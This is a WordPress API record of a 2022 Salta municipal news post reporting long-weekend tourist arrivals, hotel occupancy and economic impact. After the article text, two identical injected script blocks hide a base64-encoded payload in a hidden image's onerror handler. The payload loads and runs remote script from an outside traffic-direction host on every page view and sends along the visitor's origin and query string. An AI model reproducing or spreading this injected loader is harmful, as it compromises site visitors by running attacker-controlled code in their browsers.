{"id":1306,"date":"2022-08-16T10:42:36","date_gmt":"2022-08-16T13:42:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1306"},"modified":"2025-08-14T00:38:26","modified_gmt":"2025-08-14T03:38:26","slug":"fin-de-semana-largo-la-ciudad-de-salta-elegida-por-turistas-nacionales-y-extranjeros","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1306","title":{"rendered":"Fin de semana largo: la ciudad de Salta elegida por turistas nacionales y extranjeros"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#a6062e\"><strong>Seg\u00fan los datos del Observatorio Tur\u00edstico, el impacto econ\u00f3mico fue de m\u00e1s de $224 millones de pesos. Se registraron\u00a08773\u00a0arribos.<\/strong><\/h4>\n\n\n\n<p>La Municipalidad de la ciudad de Salta informa, a trav\u00e9s del Observatorio Tur\u00edstico, que durante este fin de semana largo correspondiente al feriado por el paso a la inmortalidad del General Jos\u00e9 de San Mart\u00edn, se registraron unos 8.773 arribos tur\u00edsticos a la ciudad, con un impacto econ\u00f3mico de $224.710.245 millones de pesos.<\/p>\n\n\n\n<p>El estudio, elaborado por el Observatorio Tur\u00edstico, reflej\u00f3&nbsp;que la ocupaci\u00f3n hotelera promedio fue del 75%, registr\u00e1ndose un 84%, como pico, el s\u00e1bado&nbsp;13 de agosto.<\/p>\n\n\n\n<p>La Secretar\u00eda de Cultura y Turismo de la Municipalidad destaca la actividad llevada a cabo por la Brigada de Anfitriones Tur\u00edsticos, la cual viene&nbsp;marcando una nueva modalidad de asistencia con informaci\u00f3n, en lugares estrat\u00e9gicos que para este fin de semana fueron la plaza 9 de Julio, el Telef\u00e9rico y la Bas\u00edlica&nbsp;Menor&nbsp;San Francisco, dando respuestas a visitantes y vecinos.<\/p>\n\n\n\n<p>\u00abApostamos al trabajo continuo y en conjunto con los privados y vemos que el turismo en nuestra ciudad est\u00e1 en el mejor camino de la recuperaci\u00f3n. Seguimos en la senda que nos plante\u00f3 la intendenta, Bettina Romero, ya que el turismo es una pol\u00edtica de Estado y un trabajo en el que debemos seguir todos aunando esfuerzos&nbsp;para mejorar\u201d,&nbsp; remarc\u00f3 Fernando Garc\u00eda Soria, secretario del \u00e1rea.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"461\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/turismo-cifras-agosto-2022-1024x461-1.jpeg\" alt=\"\" class=\"wp-image-1307\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/turismo-cifras-agosto-2022-1024x461-1.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/turismo-cifras-agosto-2022-1024x461-1-300x135.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/turismo-cifras-agosto-2022-1024x461-1-768x346.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/turismo-cifras-agosto-2022-1024x461-1-696x313.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/turismo-cifras-agosto-2022-1024x461-1-933x420.jpeg 933w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/fin-de-semana-largo-la-ciudad-de-salta-elegida-por-turistas-nacionales-y-extranjeros\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_16-8-2022_103914_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1308\" width=\"111\" height=\"45\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Seg\u00fan los datos del Observatorio Tur\u00edstico, el impacto econ\u00f3mico fue de m\u00e1s de $224 millones de pesos. Se registraron\u00a08773\u00a0arribos. La Municipalidad de la ciudad de Salta informa, a trav\u00e9s del Observatorio Tur\u00edstico, que durante este fin de semana largo correspondiente al feriado por el paso a la inmortalidad del General Jos\u00e9 de San Mart\u00edn, se [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1309,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1306","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1306"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1306"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1306\/revisions"}],"predecessor-version":[{"id":7393,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1306\/revisions\/7393"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1309"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}